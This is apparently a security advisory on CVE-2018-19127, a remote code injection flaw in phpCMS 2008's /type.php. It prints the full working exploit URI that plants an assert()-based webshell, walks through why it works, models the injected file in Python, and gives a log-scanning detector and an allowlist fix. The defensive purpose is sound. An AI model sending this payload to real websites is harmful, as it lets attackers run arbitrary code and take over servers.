By Wu Fan
Content management systems and their owners are frequently victims of attacks due to their ubiquity, rich extensibility through third-party plugins, direct exposure to incoming internet traffic, and inadequate attention to keeping the CMS and the systems they run on up to date. Due to CMS limitations, custom functionality is often hard-coded, making updates to a newer version of the CMS difficult or impossible. In addition, 0day vulnerabilities present a serious threat to anybody running even a well-maintained publicly-facing website.
This attack on an outdated phpCMS content management system from 2008 highlights several important lessons. At a minimum, any content management system should be routinely upgraded and maintained, and phpCMS 2008 owners must take immediate action. Second, any web exposure (a website, or a RESTful API) must be protected with a web firewall, which acts as an umbrella for a variety of exploits and vulnerabilities. Modern web firewalls, such as Alibaba Cloud WAF, provide additional protection that goes beyond detecting patterns that can be detected with rigid rules. Finally, a Managed Security Service can be an excellent choice for many organizations to continuously receive high-quality professional service to minimize the risks.
The situation with this particular vulnerability is complicated by the fact that many people still running phpCMS 2008 may not realize it; otherwise they would have upgraded a long time ago.
Yuriy Yuzifovich,
Head of Security Innovation Labs (S.I.L.) at Alibaba Cloud
On November 4, Alibaba Cloud Security discovered a new attack exploiting the /type.php remote GetShell 0day vulnerability in phpCMS 2008 (CNVD-C-2018-127157/CVE-2018-19127). The vulnerability allows an attacker to remotely implant a WebShell, which can lead to file tampering, data leaks, and full remote control of the server. We recommend that affected users upgrade to the latest phpCMS version as soon as possible.
phpCMS is an open-source Content Management System (CMS) that is popular in China and worldwide.
phpCMS was first launched in 2008, and its latest version is v9.6.3. Because of its stability, flexibility, and open-source nature, phpCMS 2008 is still used by many websites.
When an attacker sends a request with the following URI to a website running phpCMS 2008:
/type.php?template=tag_(){};@unlink(__FILE__);assert($_POST[1]);{//../rss
the malicious PHP code
@unlink(__FILE__);assert($_POST[1]);
is written into the website file data/cache_template/rss.tpl.php, which type.php then includes and executes.
The vulnerability is located in the /type.php file in the PHPCMS 2008 source code. The file contains the following code:
if(empty($template)) $template = 'type';
...
include template('phpcms', $template);
where the $template variable is taken from the request parameters. It is then passed to the template() function, and the path that template() returns is included. template() is defined in /include/global.func.php and contains the following call:
template_compile($module, $template, $istag);
which calls template_compile(), defined in /include/template.func.php:
function template_compile($module, $template, $istag = 0)
{
...
$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
$content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content);
$strlen = file_put_contents($compiledtplfile, $content);
...
}
In this function, the $template value is used, without any validation, to build both the file path ($compiledtplfile) and the file content ($content).
In the attack payload shown above, $template is set to:
tag_(){};@unlink(__FILE__);assert($_POST[1]);{//../rss
Therefore, when template_compile() calls file_put_contents(), the first argument (the path) is
data/cache_template/phpcms_tag_(){};@unlink(__FILE__);assert($_POST[1]);{//../rss.tpl.php
PHP normalizes this path before opening the file: the bogus directory component phpcms_tag_(){};@unlink(__FILE__);assert($_POST[1]);{ is dropped together with the ../ that follows it, so the file actually written is data/cache_template/rss.tpl.php, even though no directory with the bogus name exists.
Because $template starts with "tag_", the second argument (the content) is the function wrapper built by the ternary above, with the payload spliced into the function name. The payload is shaped so that the result is still valid PHP: "(){}" closes the generated declaration "function _tag_phpcms_tag_(){}" and the following ";" ends the statement; "@unlink(__FILE__);assert($_POST[1]);" then sits at top level; "{//" opens a block and comments out the rest of the generated line up to "?>"; and the trailing "<?php } ?>" closes that block.
Finally, @unlink(__FILE__);assert($_POST[1]);
is written to this file. When type.php includes the compiled template, this code runs: unlink() deletes the file to remove the trace, and assert(), which on PHP 5 and PHP 7.0 to 7.2 evaluates a string argument as PHP code, executes whatever the attacker sent in POST parameter 1 of the same request.
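The following Python model, added here as an illustration and not taken from phpCMS or from the original post, mirrors the two expressions from template_compile() shown above ($compiledtplfile and the "tag_" branch of $content) to show why the payload ends up as a valid PHP file at data/cache_template/rss.tpl.php. It assumes TPL_CACHEPATH is "data/cache_template/" (the path this article gives for the written file) and uses posixpath.normpath() to stand in for the ".." normalization PHP performs inside file_put_contents(). The allowlist check at the end is the kind of filter the temporary fix at the end of this article calls for.

```python
"""Model of how template_compile() in phpCMS 2008 turns the request-controlled
$template value into a file path and a file body.  Added illustration, not
phpCMS code; TPL_CACHEPATH is an assumed value."""
import posixpath
import re

TPL_CACHEPATH = "data/cache_template/"  # assumed value of the phpCMS constant
MODULE = "phpcms"                      # first argument of template('phpcms', $template)

# Variable list copied from the $content expression in template_compile().
GLOBALS_LIST = ("$PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,"
                "$templateid,$_userid,$_username")

PAYLOAD = "tag_(){};@unlink(__FILE__);assert($_POST[1]);{//../rss"


def compiled_path(template: str) -> str:
    """$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php'"""
    return TPL_CACHEPATH + MODULE + "_" + template + ".tpl.php"


def resolved_path(template: str) -> str:
    """Path that is really opened.  PHP expands the path before the open()
    call, so a non-existent directory followed by '../' is dropped even
    though that directory never existed; normpath() models the same rule."""
    return posixpath.normpath(compiled_path(template))


def compiled_content(template: str, parsed_template: str = "") -> str:
    """Body written by file_put_contents().  parsed_template stands for the
    template_parse(...) result; it is empty here because no template file
    with the attacker's name exists."""
    if not template.startswith("tag_"):
        return parsed_template
    return ("<?php function _tag_" + MODULE + "_" + template
            + "($data, $number, $rows, $count, $page, $pages, $setting){ global "
            + GLOBALS_LIST + ";@extract($setting);?>"
            + parsed_template + "<?php } ?>")


def injected_statements(template: str) -> str:
    """The part of the body that runs at top level when the file is included:
    everything between the '(){};' that closes the generated function header
    and the '{//' that comments out the rest of the generated line.  Only
    meaningful for payloads shaped like PAYLOAD."""
    body = compiled_content(template)
    head = "function _tag_" + MODULE + "_tag_(){};"
    start = body.index(head) + len(head)
    return body[start:body.index("{//", start)]


# Allowlist: a template name is letters, digits and underscores only, so no
# character that matters to a path ('/', '.') or to PHP ('(', '{', ';') passes.
SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_]+")


def is_safe_template(template: str) -> bool:
    return SAFE_TEMPLATE.fullmatch(template) is not None


if __name__ == "__main__":
    print("path as built  :", compiled_path(PAYLOAD))
    print("path written   :", resolved_path(PAYLOAD))
    print("body written   :", compiled_content(PAYLOAD))
    print("runs on include:", injected_statements(PAYLOAD))
    print("payload allowed:", is_safe_template(PAYLOAD), "/ 'rss' allowed:", is_safe_template("rss"))
```

Running the script prints the path as phpCMS builds it, the normalized path that is actually written, the complete generated PHP file, and the two statements that execute at top level when the file is included; the same allowlist, applied to $template in type.php before the template() call, rejects the payload while still accepting ordinary names such as rss or tag_rss.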
Although it is already ten years old, phpCMS 2008 is still used by many websites, including government and corporate sites: nearly 200 sites according to a network-wide exact-match search on FOFA, and over 10,000 according to a fuzzy match.
By exploiting this vulnerability, an attacker can write malicious script code to a file whose path they control and then send WebShell commands to that file to run arbitrary code on the server. The impact of this code injection vulnerability is severe.
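Because every exploitation attempt is a request to /type.php with a template parameter that is not a plain template name, the attempts are easy to spot in web server access logs. The following detector is an added example written for this article, not code from Alibaba Cloud or phpCMS; the log lines are constructed (documentation-range IPs, made-up timestamps) in Apache/Nginx "combined" format, and the decoding is applied twice so that a percent-encoded or double-encoded query string is compared in its decoded form.

```python
"""Flag CVE-2018-19127 exploitation attempts in access logs.  Added example;
the sample log lines below are constructed, not real traffic."""
import re
from urllib.parse import unquote_plus, urlsplit

SAMPLE_LOG = r"""
203.0.113.7 - - [04/Nov/2018:10:21:05 +0800] "GET /type.php?template=rss HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Nov/2018:10:21:06 +0800] "POST /type.php?template=tag_(){};@unlink(__FILE__);assert($_POST[1]);{//../rss HTTP/1.1" 200 0 "-" "python-requests/2.19"
203.0.113.9 - - [04/Nov/2018:10:21:07 +0800] "POST /type.php?template=tag_%28%29%7B%7D%3B%40unlink%28__FILE__%29%3Bassert%28%24_POST%5B1%5D%29%3B%7B%2F%2F..%2Frss HTTP/1.1" 200 0 "-" "curl/7.61"
198.51.100.2 - - [04/Nov/2018:10:22:11 +0800] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Nov/2018:10:22:12 +0800] "GET /type.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# A legitimate template name is letters, digits and underscores only.
SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_]+")


def template_values(target: str) -> list:
    """Return every template= value of a request to /type.php, URL-decoded
    twice so that single- and double-encoded payloads compare equal to the
    plain one.  The query string is split by hand (not parse_qs) because
    older Python versions also split on ';', which the payload contains."""
    parts = urlsplit(target)
    if parts.path != "/type.php":
        return []
    values = []
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "template":
            values.append(unquote_plus(unquote_plus(value)))
    return values


def suspicious_template(value: str) -> bool:
    """Anything outside [A-Za-z0-9_] can reach the file path or the generated
    PHP; the known payload needs '(', '{', ';', '/' and '.'."""
    return SAFE_TEMPLATE.fullmatch(value) is None


def scan_log(text: str) -> list:
    """Return (ip, time, decoded template) for every exploitation attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in template_values(m.group("target")):
            if suspicious_template(value):
                hits.append((m.group("ip"), m.group("time"), value))
    return hits


if __name__ == "__main__":
    for ip, when, value in scan_log(SAMPLE_LOG):
        print(f"{when} {ip} template={value!r}")
```

Both attempts from 203.0.113.9 are reported with the same decoded template value, while the legitimate template=rss request and the requests without a template parameter are not. The HTTP status is deliberately not used as a filter: the compiled template is written before type.php finishes rendering, so a successful exploit normally logs as a 200.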
A temporary mitigation is to validate $template in /type.php before it reaches template(): accept only plain template names (letters, digits, and underscores) and reject everything else, so that characters such as "(", "{", ";", "/", and "." can never become part of the file path or the generated script. Filtering out individual symbols is weaker than such an allowlist and is easy to get wrong.
However, because phpCMS 2008 is out of date, we recommend that you upgrade it to the latest phpCMS version as soon as possible to reduce your exposure.